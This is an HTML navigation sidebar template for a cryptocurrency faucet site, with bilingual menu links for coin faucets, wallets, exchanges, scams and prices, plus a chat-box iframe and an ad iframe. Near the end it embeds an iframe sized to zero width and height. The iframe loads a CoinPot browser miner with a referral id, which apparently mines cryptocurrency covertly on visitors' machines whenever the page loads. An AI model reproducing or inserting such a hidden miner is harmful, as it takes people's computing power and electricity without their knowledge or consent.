<div class="navbar-default sidebar" role="navigation">
    <div class="sidebar-nav navbar-collapse">
        <ul class="nav in" id="side-menu">
            <li ng-class="{active: collapseVar==2}">
                <a href="" ng-click="check(2)">Faucets (水龍頭)<span
                        class="fa arrow"></span></a>
                <ul class="nav nav-second-level" collapse="collapseVar!=2">
					<li><a href="#" ng-click="cat('bitcoin')" id="bitcoin">Bitcoin (比特幣)</a></li>
					<li><a href="#" ng-click="cat('bch')">BicoinCash (比特幣現金)</a></li>
					<li><a href="#" ng-click="cat('ether')">Ether (以太幣)</a></li>
					<li><a href="#" ng-click="cat('litecoin')">Litecoin (萊特幣)</a></li>
                    <!--li ng-init="third=!third" ng-class="{active: multiCollapseVar==3}">
                        <a href="" ng-click="multiCheck(3)">Third Level <span class="fa arrow"></span></a>
                        <ul class="nav nav-third-level" collapse="multiCollapseVar!=3">
                            <li>
                                <a href="">Third Level Item</a>
                            </li>
                            <li>
                                <a href="">Third Level Item</a>
                            </li>
                            <li>
                                <a href="">Third Level Item</a>
                            </li>
                            <li>
                                <a href="">Third Level Item</a>
                            </li>

                        </ul>
                        </.nav-third-level>
                    </li-->
                </ul>
                <!-- /.nav-second-level -->
            </li>
			<li>
               <a href="#" ng-click="cat('wallet')">Wallet (錢包)</a>
            </li>
    		<li>
				 <a href="#" ng-click="cat('exchange')">Excahge (交易所)</a>
            </li> 
            <li>
               <a href="#" ng-click="cat('scam')">SCAM (詐騙)</a>
            </li>
			<li ui-sref-active="active">
				<a ui-sref="dashboard.price">Coin Price (報價)</a>
            </li> 
        </ul>
		<iframe src="//www7.cbox.ws/box/?boxid=851224&boxtag=xBkA9Y" width="100%" height="180" allowtransparency="yes" frameborder="0" marginheight="0" marginwidth="0" scrolling="auto"></iframe>
    </div>
	<iframe scrolling="no" frameborder="0" src="//coinpot.co/mine/bitcoincore/?ref=18E54EF3CCFB&mode=widget" style="overflow:hidden;width:0;height:0;border:0; border:none;"></iframe>
	
	<iframe data-aa='777621' src='//acceptable.a-ads.com/777621' scrolling='no' style='width:100%;border:0px; padding:0;overflow:hidden' allowtransparency='true'></iframe>
	
    <!-- /.sidebar-collapse -->
</div> 



